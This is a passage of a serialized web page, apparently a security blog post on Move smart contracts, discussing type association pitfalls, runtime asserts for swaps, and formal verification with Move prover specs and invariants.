create",{"type":28,"tag":116,"props":6786,"children":6787},{"style":266},[6788],{"type":33,"value":514},{"type":28,"tag":116,"props":6790,"children":6791},{"style":339},[6792],{"type":33,"value":6574},{"type":28,"tag":116,"props":6794,"children":6795},{"style":266},[6796],{"type":33,"value":6260},{"type":28,"tag":116,"props":6798,"children":6799},{"class":245,"line":256},[6800,6805,6809,6814,6819],{"type":28,"tag":116,"props":6801,"children":6802},{"style":272},[6803],{"type":33,"value":6804},"      lp_store",{"type":28,"tag":116,"props":6806,"children":6807},{"style":370},[6808],{"type":33,"value":4160},{"type":28,"tag":116,"props":6810,"children":6811},{"style":370},[6812],{"type":33,"value":6813}," &",{"type":28,"tag":116,"props":6815,"children":6816},{"style":272},[6817],{"type":33,"value":6818},"signer",{"type":28,"tag":116,"props":6820,"children":6821},{"style":266},[6822],{"type":33,"value":3178},{"type":28,"tag":116,"props":6824,"children":6825},{"class":245,"line":293},[6826],{"type":28,"tag":116,"props":6827,"children":6828},{"style":250},[6829],{"type":33,"value":6268},{"type":28,"tag":116,"props":6831,"children":6832},{"class":245,"line":361},[6833,6838,6842,6847],{"type":28,"tag":116,"props":6834,"children":6835},{"style":266},[6836],{"type":33,"value":6837},"  ) ",{"type":28,"tag":116,"props":6839,"children":6840},{"style":272},[6841],{"type":33,"value":6015},{"type":28,"tag":116,"props":6843,"children":6844},{"style":339},[6845],{"type":33,"value":6846}," Reserves",{"type":28,"tag":116,"props":6848,"children":6849},{"style":266},[6850],{"type":33,"value":1291},{"type":28,"tag":116,"props":6852,"children":6853},{"class":245,"line":387},[6854,6859,6863,6868,6873,6877,6882,6886,6891],{"type":28,"tag":116,"props":6855,"children":6856},{"style":266},[6857],{"type":33,"value":6858},"      lp",{"type":28,"tag":116,"props":6860,"children":6861},{"style":370},[6862],{"type":33,"value":3151},{"type":28,"tag":116,"props":6864,"children":6865},{"style":282},[6866],{"type":33,"value":6867},"assert_is_lp_store",{"type":28,"tag":116,"props":6869,"children":6870},{"style":266},[6871],{"type":33,"value":6872},"(signer",{"type":28,"tag":116,"props":6874,"children":6875},{"style":370},[6876],{"type":33,"value":3151},{"type":28,"tag":116,"props":6878,"children":6879},{"style":282},[6880],{"type":33,"value":6881},"address_of",{"type":28,"tag":116,"props":6883,"children":6884},{"style":266},[6885],{"type":33,"value":313},{"type":28,"tag":116,"props":6887,"children":6888},{"style":272},[6889],{"type":33,"value":6890},"lp_store",{"type":28,"tag":116,"props":6892,"children":6893},{"style":266},[6894],{"type":33,"value":1929},{"type":28,"tag":116,"props":6896,"children":6897},{"class":245,"line":400},[6898],{"type":28,"tag":116,"props":6899,"children":6900},{"emptyLinePlaceholder":19},[6901],{"type":33,"value":1044},{"type":28,"tag":116,"props":6903,"children":6904},{"class":245,"line":614},[6905],{"type":28,"tag":116,"props":6906,"children":6907},{"style":250},[6908],{"type":33,"value":6268},{"type":28,"tag":116,"props":6910,"children":6911},{"class":245,"line":631},[6912],{"type":28,"tag":116,"props":6913,"children":6914},{"emptyLinePlaceholder":19},[6915],{"type":33,"value":1044},{"type":28,"tag":116,"props":6917,"children":6918},{"class":245,"line":665},[6919,6924,6928,6932,6936,6940,6944,6948],{"type":28,"tag":116,"props":6920,"children":6921},{"style":282},[6922],{"type":33,"value":6923},"      move_to",{"type":28,"tag":116,"props":6925,"children":6926},{"style":266},[6927],{"type":33,"value":313},{"type":28,"tag":116,"props":6929,"children":6930},{"style":272},[6931],{"type":33,"value":6890},{"type":28,"tag":116,"props":6933,"children":6934},{"style":266},[6935],{"type":33,"value":825},{"type":28,"tag":116,"props":6937,"children":6938},{"style":339},[6939],{"type":33,"value":6475},{"type":28,"tag":116,"props":6941,"children":6942},{"style":266},[6943],{"type":33,"value":514},{"type":28,"tag":116,"props":6945,"children":6946},{"style":339},[6947],{"type":33,"value":6574},{"type":28,"tag":116,"props":6949,"children":6950},{"style":266},[6951],{"type":33,"value":6952},"> {\n",{"type":28,"tag":116,"props":6954,"children":6955},{"class":245,"line":713},[6956],{"type":28,"tag":116,"props":6957,"children":6958},{"style":250},[6959],{"type":33,"value":5846},{"type":28,"tag":116,"props":6961,"children":6962},{"class":245,"line":750},[6963],{"type":28,"tag":116,"props":6964,"children":6965},{"style":266},[6966],{"type":33,"value":6967},"      });\n",{"type":28,"tag":29,"props":6969,"children":6970},{},[6971],{"type":33,"value":6972},"In both these instances, type association only works because we create exactly one instance per type.",{"type":28,"tag":29,"props":6974,"children":6975},{},[6976,6978,6984,6986,6992,6994,6999],{"type":33,"value":6977},"On the other hand, consider if you have a ",{"type":28,"tag":98,"props":6979,"children":6981},{"className":6980},[],[6982],{"type":33,"value":6983},"Position\u003CT>",{"type":33,"value":6985}," and a ",{"type":28,"tag":98,"props":6987,"children":6989},{"className":6988},[],[6990],{"type":33,"value":6991},"Market\u003CT>",{"type":33,"value":6993}," where ",{"type":28,"tag":98,"props":6995,"children":6997},{"className":6996},[],[6998],{"type":33,"value":5659},{"type":33,"value":7000}," is the coin type.",{"type":28,"tag":234,"props":7002,"children":7004},{"className":2652,"code":7003,"language":2651,"meta":7,"style":7},"    struct Market\u003Cphantom T> {\n        reserves: Coin\u003CT>,\n        // ...\n    }\n\n    struct Position\u003Cphantom T> {\n        amount: u64,\n        // ...\n    }\n",[7005],{"type":28,"tag":98,"props":7006,"children":7007},{"__ignoreMap":7},[7008,7036,7064,7071,7078,7085,7113,7133,7140],{"type":28,"tag":116,"props":7009,"children":7010},{"class":245,"line":246},[7011,7015,7020,7024,7028,7032],{"type":28,"tag":116,"props":7012,"children":7013},{"style":376},[7014],{"type":33,"value":5723},{"type":28,"tag":116,"props":7016,"children":7017},{"style":339},[7018],{"type":33,"value":7019}," Market",{"type":28,"tag":116,"props":7021,"children":7022},{"style":266},[7023],{"type":33,"value":514},{"type":28,"tag":116,"props":7025,"children":7026},{"style":272},[7027],{"type":33,"value":5482},{"type":28,"tag":116,"props":7029,"children":7030},{"style":339},[7031],{"type":33,"value":5590},{"type":28,"tag":116,"props":7033,"children":7034},{"style":266},[7035],{"type":33,"value":6952},{"type":28,"tag":116,"props":7037,"children":7038},{"class":245,"line":256},[7039,7044,7048,7052,7056,7060],{"type":28,"tag":116,"props":7040,"children":7041},{"style":272},[7042],{"type":33,"value":7043},"        reserves",{"type":28,"tag":116,"props":7045,"children":7046},{"style":370},[7047],{"type":33,"value":4160},{"type":28,"tag":116,"props":7049,"children":7050},{"style":339},[7051],{"type":33,"value":5473},{"type":28,"tag":116,"props":7053,"children":7054},{"style":266},[7055],{"type":33,"value":514},{"type":28,"tag":116,"props":7057,"children":7058},{"style":339},[7059],{"type":33,"value":5659},{"type":28,"tag":116,"props":7061,"children":7062},{"style":266},[7063],{"type":33,"value":5809},{"type":28,"tag":116,"props":7065,"children":7066},{"class":245,"line":293},[7067],{"type":28,"tag":116,"props":7068,"children":7069},{"style":250},[7070],{"type":33,"value":5846},{"type":28,"tag":116,"props":7072,"children":7073},{"class":245,"line":361},[7074],{"type":28,"tag":116,"props":7075,"children":7076},{"style":266},[7077],{"type":33,"value":3025},{"type":28,"tag":116,"props":7079,"children":7080},{"class":245,"line":387},[7081],{"type":28,"tag":116,"props":7082,"children":7083},{"emptyLinePlaceholder":19},[7084],{"type":33,"value":1044},{"type":28,"tag":116,"props":7086,"children":7087},{"class":245,"line":400},[7088,7092,7097,7101,7105,7109],{"type":28,"tag":116,"props":7089,"children":7090},{"style":376},[7091],{"type":33,"value":5723},{"type":28,"tag":116,"props":7093,"children":7094},{"style":339},[7095],{"type":33,"value":7096}," Position",{"type":28,"tag":116,"props":7098,"children":7099},{"style":266},[7100],{"type":33,"value":514},{"type":28,"tag":116,"props":7102,"children":7103},{"style":272},[7104],{"type":33,"value":5482},{"type":28,"tag":116,"props":7106,"children":7107},{"style":339},[7108],{"type":33,"value":5590},{"type":28,"tag":116,"props":7110,"children":7111},{"style":266},[7112],{"type":33,"value":6952},{"type":28,"tag":116,"props":7114,"children":7115},{"class":245,"line":614},[7116,7121,7125,7129],{"type":28,"tag":116,"props":7117,"children":7118},{"style":272},[7119],{"type":33,"value":7120},"        amount",{"type":28,"tag":116,"props":7122,"children":7123},{"style":370},[7124],{"type":33,"value":4160},{"type":28,"tag":116,"props":7126,"children":7127},{"style":339},[7128],{"type":33,"value":5531},{"type":28,"tag":116,"props":7130,"children":7131},{"style":266},[7132],{"type":33,"value":3178},{"type":28,"tag":116,"props":7134,"children":7135},{"class":245,"line":631},[7136],{"type":28,"tag":116,"props":7137,"children":7138},{"style":250},[7139],{"type":33,"value":5846},{"type":28,"tag":116,"props":7141,"children":7142},{"class":245,"line":665},[7143],{"type":28,"tag":116,"props":7144,"children":7145},{"style":266},[7146],{"type":33,"value":3025},{"type":28,"tag":29,"props":7148,"children":7149},{},[7150,7152,7157,7159,7164],{"type":33,"value":7151},"If ",{"type":28,"tag":98,"props":7153,"children":7155},{"className":7154},[],[7156],{"type":33,"value":6991},{"type":33,"value":7158}," isn't a unique type -- or in other words if you're able to create more than one instance of a market per type ",{"type":28,"tag":98,"props":7160,"children":7162},{"className":7161},[],[7163],{"type":33,"value":5659},{"type":33,"value":7165}," -- you might be able to pass in the incorrect market for a given position. This is a common vulnerability pattern on Solana.",{"type":28,"tag":29,"props":7167,"children":7168},{},[7169],{"type":33,"value":7170},"Dynamic iteration of types is also impossible (at least as currently designed by the Move VM) leading to massive headaches for developers. In these scenarios, we empirically observe developers defaulting back to type reflection APIs, complicating code unnecessarily. Security at the expense of usability comes at the expense of security.",{"type":28,"tag":234,"props":7172,"children":7174},{"className":2652,"code":7173,"language":2651,"meta":7,"style":7},"    /// Get the price of the token per lamport.\n    public fun get_price(type_info: TypeInfo): Decimal acquires Oracle {\n        let oracle = borrow_global_mut\u003COracle>(@oracle);\n        let price = table::borrow_mut_with_default\u003CTypeInfo, Decimal>(\n            &mut oracle.prices,\n            type_info,\n            decimal::one()\n        );\n        *price\n    }\n",[7175],{"type":28,"tag":98,"props":7176,"children":7177},{"__ignoreMap":7},[7178,7186,7248,7297,7349,7374,7386,7408,7416,7429],{"type":28,"tag":116,"props":7179,"children":7180},{"class":245,"line":246},[7181],{"type":28,"tag":116,"props":7182,"children":7183},{"style":250},[7184],{"type":33,"value":7185},"    /// Get the price of the token per lamport.\n",{"type":28,"tag":116,"props":7187,"children":7188},{"class":245,"line":256},[7189,7194,7198,7203,7207,7212,7216,7221,7225,7229,7234,7239,7244],{"type":28,"tag":116,"props":7190,"children":7191},{"style":272},[7192],{"type":33,"value":7193},"    public",{"type":28,"tag":116,"props":7195,"children":7196},{"style":272},[7197],{"type":33,"value":5878},{"type":28,"tag":116,"props":7199,"children":7200},{"style":282},[7201],{"type":33,"value":7202}," get_price",{"type":28,"tag":116,"props":7204,"children":7205},{"style":266},[7206],{"type":33,"value":313},{"type":28,"tag":116,"props":7208,"children":7209},{"style":272},[7210],{"type":33,"value":7211},"type_info",{"type":28,"tag":116,"props":7213,"children":7214},{"style":370},[7215],{"type":33,"value":4160},{"type":28,"tag":116,"props":7217,"children":7218},{"style":339},[7219],{"type":33,"value":7220}," TypeInfo",{"type":28,"tag":116,"props":7222,"children":7223},{"style":266},[7224],{"type":33,"value":1829},{"type":28,"tag":116,"props":7226,"children":7227},{"style":370},[7228],{"type":33,"value":4160},{"type":28,"tag":116,"props":7230,"children":7231},{"style":339},[7232],{"type":33,"value":7233}," Decimal",{"type":28,"tag":116,"props":7235,"children":7236},{"style":272},[7237],{"type":33,"value":7238}," acquires",{"type":28,"tag":116,"props":7240,"children":7241},{"style":339},[7242],{"type":33,"value":7243}," Oracle",{"type":28,"tag":116,"props":7245,"children":7246},{"style":266},[7247],{"type":33,"value":1291},{"type":28,"tag":116,"props":7249,"children":7250},{"class":245,"line":293},[7251,7255,7260,7264,7269,7273,7278,7283,7288,7293],{"type":28,"tag":116,"props":7252,"children":7253},{"style":376},[7254],{"type":33,"value":2736},{"type":28,"tag":116,"props":7256,"children":7257},{"style":272},[7258],{"type":33,"value":7259}," oracle",{"type":28,"tag":116,"props":7261,"children":7262},{"style":370},[7263],{"type":33,"value":2226},{"type":28,"tag":116,"props":7265,"children":7266},{"style":272},[7267],{"type":33,"value":7268}," borrow_global_mut",{"type":28,"tag":116,"props":7270,"children":7271},{"style":266},[7272],{"type":33,"value":514},{"type":28,"tag":116,"props":7274,"children":7275},{"style":339},[7276],{"type":33,"value":7277},"Oracle",{"type":28,"tag":116,"props":7279,"children":7280},{"style":266},[7281],{"type":33,"value":7282},">(",{"type":28,"tag":116,"props":7284,"children":7285},{"style":370},[7286],{"type":33,"value":7287},"@",{"type":28,"tag":116,"props":7289,"children":7290},{"style":272},[7291],{"type":33,"value":7292},"oracle",{"type":28,"tag":116,"props":7294,"children":7295},{"style":266},[7296],{"type":33,"value":895},{"type":28,"tag":116,"props":7298,"children":7299},{"class":245,"line":361},[7300,7304,7309,7313,7318,7322,7327,7331,7336,7340,7345],{"type":28,"tag":116,"props":7301,"children":7302},{"style":376},[7303],{"type":33,"value":2736},{"type":28,"tag":116,"props":7305,"children":7306},{"style":272},[7307],{"type":33,"value":7308}," price",{"type":28,"tag":116,"props":7310,"children":7311},{"style":370},[7312],{"type":33,"value":2226},{"type":28,"tag":116,"props":7314,"children":7315},{"style":266},[7316],{"type":33,"value":7317}," table",{"type":28,"tag":116,"props":7319,"children":7320},{"style":370},[7321],{"type":33,"value":3151},{"type":28,"tag":116,"props":7323,"children":7324},{"style":272},[7325],{"type":33,"value":7326},"borrow_mut_with_default",{"type":28,"tag":116,"props":7328,"children":7329},{"style":266},[7330],{"type":33,"value":514},{"type":28,"tag":116,"props":7332,"children":7333},{"style":339},[7334],{"type":33,"value":7335},"TypeInfo",{"type":28,"tag":116,"props":7337,"children":7338},{"style":266},[7339],{"type":33,"value":825},{"type":28,"tag":116,"props":7341,"children":7342},{"style":339},[7343],{"type":33,"value":7344},"Decimal",{"type":28,"tag":116,"props":7346,"children":7347},{"style":266},[7348],{"type":33,"value":6260},{"type":28,"tag":116,"props":7350,"children":7351},{"class":245,"line":387},[7352,7357,7361,7365,7369],{"type":28,"tag":116,"props":7353,"children":7354},{"style":370},[7355],{"type":33,"value":7356},"            &",{"type":28,"tag":116,"props":7358,"children":7359},{"style":376},[7360],{"type":33,"value":3394},{"type":28,"tag":116,"props":7362,"children":7363},{"style":272},[7364],{"type":33,"value":7259},{"type":28,"tag":116,"props":7366,"children":7367},{"style":370},[7368],{"type":33,"value":141},{"type":28,"tag":116,"props":7370,"children":7371},{"style":266},[7372],{"type":33,"value":7373},"prices,\n",{"type":28,"tag":116,"props":7375,"children":7376},{"class":245,"line":400},[7377,7382],{"type":28,"tag":116,"props":7378,"children":7379},{"style":272},[7380],{"type":33,"value":7381},"            type_info",{"type":28,"tag":116,"props":7383,"children":7384},{"style":266},[7385],{"type":33,"value":3178},{"type":28,"tag":116,"props":7387,"children":7388},{"class":245,"line":614},[7389,7394,7398,7403],{"type":28,"tag":116,"props":7390,"children":7391},{"style":266},[7392],{"type":33,"value":7393},"            decimal",{"type":28,"tag":116,"props":7395,"children":7396},{"style":370},[7397],{"type":33,"value":3151},{"type":28,"tag":116,"props":7399,"children":7400},{"style":282},[7401],{"type":33,"value":7402},"one",{"type":28,"tag":116,"props":7404,"children":7405},{"style":266},[7406],{"type":33,"value":7407},"()\n",{"type":28,"tag":116,"props":7409,"children":7410},{"class":245,"line":631},[7411],{"type":28,"tag":116,"props":7412,"children":7413},{"style":266},[7414],{"type":33,"value":7415},"        );\n",{"type":28,"tag":116,"props":7417,"children":7418},{"class":245,"line":665},[7419,7424],{"type":28,"tag":116,"props":7420,"children":7421},{"style":370},[7422],{"type":33,"value":7423},"        *",{"type":28,"tag":116,"props":7425,"children":7426},{"style":272},[7427],{"type":33,"value":7428},"price\n",{"type":28,"tag":116,"props":7430,"children":7431},{"class":245,"line":713},[7432],{"type":28,"tag":116,"props":7433,"children":7434},{"style":266},[7435],{"type":33,"value":3025},{"type":28,"tag":29,"props":7437,"children":7438},{},[7439,7441,7446],{"type":33,"value":7440},"Type association feels like a proxy for the intended pattern -- associating resources with instances. It's very useful being able to store a reference to an ",{"type":28,"tag":2583,"props":7442,"children":7443},{},[7444],{"type":33,"value":7445},"instance",{"type":33,"value":7447}," of another resource (which is possible in Diem style move).",{"type":28,"tag":29,"props":7449,"children":7450},{},[7451],{"type":33,"value":7452},"In summary, when using type systems to bind resources to each other, it's important to either",{"type":28,"tag":455,"props":7454,"children":7455},{},[7456,7461],{"type":28,"tag":459,"props":7457,"children":7458},{},[7459],{"type":33,"value":7460},"Have unique initializers for your resources",{"type":28,"tag":459,"props":7462,"children":7463},{},[7464],{"type":33,"value":7465},"Associate resources with instances directly",{"type":28,"tag":63,"props":7467,"children":7469},{"id":7468},"formal-verification",[7470],{"type":33,"value":7471},"Formal Verification",{"type":28,"tag":29,"props":7473,"children":7474},{},[7475],{"type":33,"value":7476},"Formal verification is another exciting feature.",{"type":28,"tag":29,"props":7478,"children":7479},{},[7480],{"type":33,"value":7481},"As part of our work with protocols, we actively use formal verification to prove aspects of security.",{"type":28,"tag":29,"props":7483,"children":7484},{},[7485,7487,7492],{"type":33,"value":7486},"However, this isn't a silver bullet. The key is figuring out ",{"type":28,"tag":2583,"props":7488,"children":7489},{},[7490],{"type":33,"value":7491},"what",{"type":33,"value":7493}," to prove.",{"type":28,"tag":29,"props":7495,"children":7496},{},[7497,7499,7506],{"type":33,"value":7498},"One obvious idea might be a properties across a particular function. For example, we might want to ensure that a swap doesn't reduce the value of the pool -- similar to the ",{"type":28,"tag":87,"props":7500,"children":7503},{"href":7501,"rel":7502},"https://osec.io/blog/reports/2022-04-26-spl-swap-rounding/",[91],[7504],{"type":33,"value":7505},"Solana AMM rounding issue",{"type":33,"value":7507}," we reported.",{"type":28,"tag":29,"props":7509,"children":7510},{},[7511],{"type":33,"value":7512},"However, this could also be checked with a simple runtime assert. For example, we recommended Pontem assert that liquidity pool token values are strictly increasing.",{"type":28,"tag":234,"props":7514,"children":7516},{"className":2652,"code":7515,"language":2651,"meta":7,"style":7},"  let cmp = u256::compare(&lp_value_after_swap_and_fee, &lp_value_before_swap_u256);\n  assert!(cmp == 2, ERR_INCORRECT_SWAP);\n",[7517],{"type":28,"tag":98,"props":7518,"children":7519},{"__ignoreMap":7},[7520,7581],{"type":28,"tag":116,"props":7521,"children":7522},{"class":245,"line":246},[7523,7528,7533,7537,7542,7546,7551,7555,7559,7564,7568,7572,7577],{"type":28,"tag":116,"props":7524,"children":7525},{"style":376},[7526],{"type":33,"value":7527},"  let",{"type":28,"tag":116,"props":7529,"children":7530},{"style":272},[7531],{"type":33,"value":7532}," cmp",{"type":28,"tag":116,"props":7534,"children":7535},{"style":370},[7536],{"type":33,"value":2226},{"type":28,"tag":116,"props":7538,"children":7539},{"style":266},[7540],{"type":33,"value":7541}," u256",{"type":28,"tag":116,"props":7543,"children":7544},{"style":370},[7545],{"type":33,"value":3151},{"type":28,"tag":116,"props":7547,"children":7548},{"style":282},[7549],{"type":33,"value":7550},"compare",{"type":28,"tag":116,"props":7552,"children":7553},{"style":266},[7554],{"type":33,"value":313},{"type":28,"tag":116,"props":7556,"children":7557},{"style":370},[7558],{"type":33,"value":2780},{"type":28,"tag":116,"props":7560,"children":7561},{"style":272},[7562],{"type":33,"value":7563},"lp_value_after_swap_and_fee",{"type":28,"tag":116,"props":7565,"children":7566},{"style":266},[7567],{"type":33,"value":825},{"type":28,"tag":116,"props":7569,"children":7570},{"style":370},[7571],{"type":33,"value":2780},{"type":28,"tag":116,"props":7573,"children":7574},{"style":272},[7575],{"type":33,"value":7576},"lp_value_before_swap_u256",{"type":28,"tag":116,"props":7578,"children":7579},{"style":266},[7580],{"type":33,"value":895},{"type":28,"tag":116,"props":7582,"children":7583},{"class":245,"line":256},[7584,7589,7593,7598,7602,7607],{"type":28,"tag":116,"props":7585,"children":7586},{"style":282},[7587],{"type":33,"value":7588},"  assert!",{"type":28,"tag":116,"props":7590,"children":7591},{"style":266},[7592],{"type":33,"value":313},{"type":28,"tag":116,"props":7594,"children":7595},{"style":272},[7596],{"type":33,"value":7597},"cmp",{"type":28,"tag":116,"props":7599,"children":7600},{"style":370},[7601],{"type":33,"value":2953},{"type":28,"tag":116,"props":7603,"children":7604},{"style":350},[7605],{"type":33,"value":7606}," 2",{"type":28,"tag":116,"props":7608,"children":7609},{"style":266},[7610],{"type":33,"value":7611},", ERR_INCORRECT_SWAP);\n",{"type":28,"tag":29,"props":7613,"children":7614},{},[7615,7617,7622],{"type":33,"value":7616},"The move prover really shines when we're proving relationships ",{"type":28,"tag":2583,"props":7618,"children":7619},{},[7620],{"type":33,"value":7621},"between",{"type":33,"value":7623}," functions.",{"type":28,"tag":29,"props":7625,"children":7626},{},[7627,7629,7635],{"type":33,"value":7628},"One example of a more complicated relationship that can't be proved easily via assertions would be the ",{"type":28,"tag":98,"props":7630,"children":7632},{"className":7631},[],[7633],{"type":33,"value":7634},"no_free_money_theorem",{"type":33,"value":7636}," in the move repository.",{"type":28,"tag":234,"props":7638,"children":7640},{"className":2652,"code":7639,"language":2651,"meta":7,"style":7},"  // #[test] // TODO: cannot specify the test-only functions\n  fun no_free_money_theorem(coin1_in: u64, coin2_in: u64): (u64, u64) acquires Pool {\n      let share = add_liquidity(coin1_in, coin2_in);\n      remove_liquidity(share)\n  }\n  spec no_free_money_theorem {\n      pragma verify=false;\n      ensures result_1 \u003C= coin1_in;\n      ensures result_2 \u003C= coin2_in;\n  }\n",[7641],{"type":28,"tag":98,"props":7642,"children":7643},{"__ignoreMap":7},[7644,7652,7740,7782,7803,7810,7826,7852,7879,7904],{"type":28,"tag":116,"props":7645,"children":7646},{"class":245,"line":246},[7647],{"type":28,"tag":116,"props":7648,"children":7649},{"style":250},[7650],{"type":33,"value":7651},"  // #[test] // TODO: cannot specify the test-only functions\n",{"type":28,"tag":116,"props":7653,"children":7654},{"class":245,"line":256},[7655,7659,7664,7668,7673,7677,7681,7685,7690,7694,7698,7702,7706,7710,7715,7719,7723,7727,7731,7736],{"type":28,"tag":116,"props":7656,"children":7657},{"style":272},[7658],{"type":33,"value":6241},{"type":28,"tag":116,"props":7660,"children":7661},{"style":282},[7662],{"type":33,"value":7663}," no_free_money_theorem",{"type":28,"tag":116,"props":7665,"children":7666},{"style":266},[7667],{"type":33,"value":313},{"type":28,"tag":116,"props":7669,"children":7670},{"style":272},[7671],{"type":33,"value":7672},"coin1_in",{"type":28,"tag":116,"props":7674,"children":7675},{"style":370},[7676],{"type":33,"value":4160},{"type":28,"tag":116,"props":7678,"children":7679},{"style":339},[7680],{"type":33,"value":5531},{"type":28,"tag":116,"props":7682,"children":7683},{"style":266},[7684],{"type":33,"value":825},{"type":28,"tag":116,"props":7686,"children":7687},{"style":272},[7688],{"type":33,"value":7689},"coin2_in",{"type":28,"tag":116,"props":7691,"children":7692},{"style":370},[7693],{"type":33,"value":4160},{"type":28,"tag":116,"props":7695,"children":7696},{"style":339},[7697],{"type":33,"value":5531},{"type":28,"tag":116,"props":7699,"children":7700},{"style":266},[7701],{"type":33,"value":1829},{"type":28,"tag":116,"props":7703,"children":7704},{"style":370},[7705],{"type":33,"value":4160},{"type":28,"tag":116,"props":7707,"children":7708},{"style":266},[7709],{"type":33,"value":269},{"type":28,"tag":116,"props":7711,"children":7712},{"style":339},[7713],{"type":33,"value":7714},"u64",{"type":28,"tag":116,"props":7716,"children":7717},{"style":266},[7718],{"type":33,"value":825},{"type":28,"tag":116,"props":7720,"children":7721},{"style":339},[7722],{"type":33,"value":7714},{"type":28,"tag":116,"props":7724,"children":7725},{"style":266},[7726],{"type":33,"value":1609},{"type":28,"tag":116,"props":7728,"children":7729},{"style":272},[7730],{"type":33,"value":6015},{"type":28,"tag":116,"props":7732,"children":7733},{"style":339},[7734],{"type":33,"value":7735}," Pool",{"type":28,"tag":116,"props":7737,"children":7738},{"style":266},[7739],{"type":33,"value":1291},{"type":28,"tag":116,"props":7741,"children":7742},{"class":245,"line":293},[7743,7748,7753,7757,7762,7766,7770,7774,7778],{"type":28,"tag":116,"props":7744,"children":7745},{"style":376},[7746],{"type":33,"value":7747},"      let",{"type":28,"tag":116,"props":7749,"children":7750},{"style":272},[7751],{"type":33,"value":7752}," share",{"type":28,"tag":116,"props":7754,"children":7755},{"style":370},[7756],{"type":33,"value":2226},{"type":28,"tag":116,"props":7758,"children":7759},{"style":282},[7760],{"type":33,"value":7761}," add_liquidity",{"type":28,"tag":116,"props":7763,"children":7764},{"style":266},[7765],{"type":33,"value":313},{"type":28,"tag":116,"props":7767,"children":7768},{"style":272},[7769],{"type":33,"value":7672},{"type":28,"tag":116,"props":7771,"children":7772},{"style":266},[7773],{"type":33,"value":825},{"type":28,"tag":116,"props":7775,"children":7776},{"style":272},[7777],{"type":33,"value":7689},{"type":28,"tag":116,"props":7779,"children":7780},{"style":266},[7781],{"type":33,"value":895},{"type":28,"tag":116,"props":7783,"children":7784},{"class":245,"line":361},[7785,7790,7794,7799],{"type":28,"tag":116,"props":7786,"children":7787},{"style":282},[7788],{"type":33,"value":7789},"      remove_liquidity",{"type":28,"tag":116,"props":7791,"children":7792},{"style":266},[7793],{"type":33,"value":313},{"type":28,"tag":116,"props":7795,"children":7796},{"style":272},[7797],{"type":33,"value":7798},"share",{"type":28,"tag":116,"props":7800,"children":7801},{"style":266},[7802],{"type":33,"value":2830},{"type":28,"tag":116,"props":7804,"children":7805},{"class":245,"line":387},[7806],{"type":28,"tag":116,"props":7807,"children":7808},{"style":266},[7809],{"type":33,"value":5543},{"type":28,"tag":116,"props":7811,"children":7812},{"class":245,"line":400},[7813,7818,7822],{"type":28,"tag":116,"props":7814,"children":7815},{"style":272},[7816],{"type":33,"value":7817},"  spec",{"type":28,"tag":116,"props":7819,"children":7820},{"style":272},[7821],{"type":33,"value":7663},{"type":28,"tag":116,"props":7823,"children":7824},{"style":266},[7825],{"type":33,"value":1291},{"type":28,"tag":116,"props":7827,"children":7828},{"class":245,"line":614},[7829,7834,7839,7843,7848],{"type":28,"tag":116,"props":7830,"children":7831},{"style":272},[7832],{"type":33,"value":7833},"      pragma",{"type":28,"tag":116,"props":7835,"children":7836},{"style":272},[7837],{"type":33,"value":7838}," verify",{"type":28,"tag":116,"props":7840,"children":7841},{"style":370},[7842],{"type":33,"value":373},{"type":28,"tag":116,"props":7844,"children":7845},{"style":376},[7846],{"type":33,"value":7847},"false",{"type":28,"tag":116,"props":7849,"children":7850},{"style":266},[7851],{"type":33,"value":384},{"type":28,"tag":116,"props":7853,"children":7854},{"class":245,"line":631},[7855,7860,7865,7870,7875],{"type":28,"tag":116,"props":7856,"children":7857},{"style":272},[7858],{"type":33,"value":7859},"      ensures",{"type":28,"tag":116,"props":7861,"children":7862},{"style":272},[7863],{"type":33,"value":7864}," result_1",{"type":28,"tag":116,"props":7866,"children":7867},{"style":370},[7868],{"type":33,"value":7869}," \u003C=",{"type":28,"tag":116,"props":7871,"children":7872},{"style":272},[7873],{"type":33,"value":7874}," coin1_in",{"type":28,"tag":116,"props":7876,"children":7877},{"style":266},[7878],{"type":33,"value":384},{"type":28,"tag":116,"props":7880,"children":7881},{"class":245,"line":665},[7882,7886,7891,7895,7900],{"type":28,"tag":116,"props":7883,"children":7884},{"style":272},[7885],{"type":33,"value":7859},{"type":28,"tag":116,"props":7887,"children":7888},{"style":272},[7889],{"type":33,"value":7890}," result_2",{"type":28,"tag":116,"props":7892,"children":7893},{"style":370},[7894],{"type":33,"value":7869},{"type":28,"tag":116,"props":7896,"children":7897},{"style":272},[7898],{"type":33,"value":7899}," coin2_in",{"type":28,"tag":116,"props":7901,"children":7902},{"style":266},[7903],{"type":33,"value":384},{"type":28,"tag":116,"props":7905,"children":7906},{"class":245,"line":713},[7907],{"type":28,"tag":116,"props":7908,"children":7909},{"style":266},[7910],{"type":33,"value":5543},{"type":28,"tag":29,"props":7912,"children":7913},{},[7914],{"type":33,"value":7915},"There's no clean way to express this with an assert because this makes an observation across two functions which are temporally separated.",{"type":28,"tag":29,"props":7917,"children":7918},{},[7919,7921,7926],{"type":33,"value":7920},"Invariant's are also extremely useful. For example, enforcing invariants about fee parameters (fee can never be greater than 100%) or pool supply makes it a ",{"type":28,"tag":2583,"props":7922,"children":7923},{},[7924],{"type":33,"value":7925},"lot",{"type":33,"value":7927}," easier to reason about the protocol.",{"type":28,"tag":29,"props":7929,"children":7930},{},[7931],{"type":33,"value":7932},"For example, Ian uses invariants to clearly define core properties of his AMM state.",{"type":28,"tag":234,"props":7934,"children":7936},{"className":2652,"code":7935,"language":2651,"meta":7,"style":7},"spec PoolState {\n    invariant supply >= MINIMUM_LIQUIDITY;\n}\n",[7937],{"type":28,"tag":98,"props":7938,"children":7939},{"__ignoreMap":7},[7940,7957,7980],{"type":28,"tag":116,"props":7941,"children":7942},{"class":245,"line":246},[7943,7948,7953],{"type":28,"tag":116,"props":7944,"children":7945},{"style":272},[7946],{"type":33,"value":7947},"spec",{"type":28,"tag":116,"props":7949,"children":7950},{"style":339},[7951],{"type":33,"value":7952}," PoolState",{"type":28,"tag":116,"props":7954,"children":7955},{"style":266},[7956],{"type":33,"value":1291},{"type":28,"tag":116,"props":7958,"children":7959},{"class":245,"line":256},[7960,7965,7970,7975],{"type":28,"tag":116,"props":7961,"children":7962},{"style":272},[7963],{"type":33,"value":7964},"    invariant",{"type":28,"tag":116,"props":7966,"children":7967},{"style":272},[7968],{"type":33,"value":7969}," supply",{"type":28,"tag":116,"props":7971,"children":7972},{"style":370},[7973],{"type":33,"value":7974}," >=",{"type":28,"tag":116,"props":7976,"children":7977},{"style":266},[7978],{"type":33,"value":7979}," 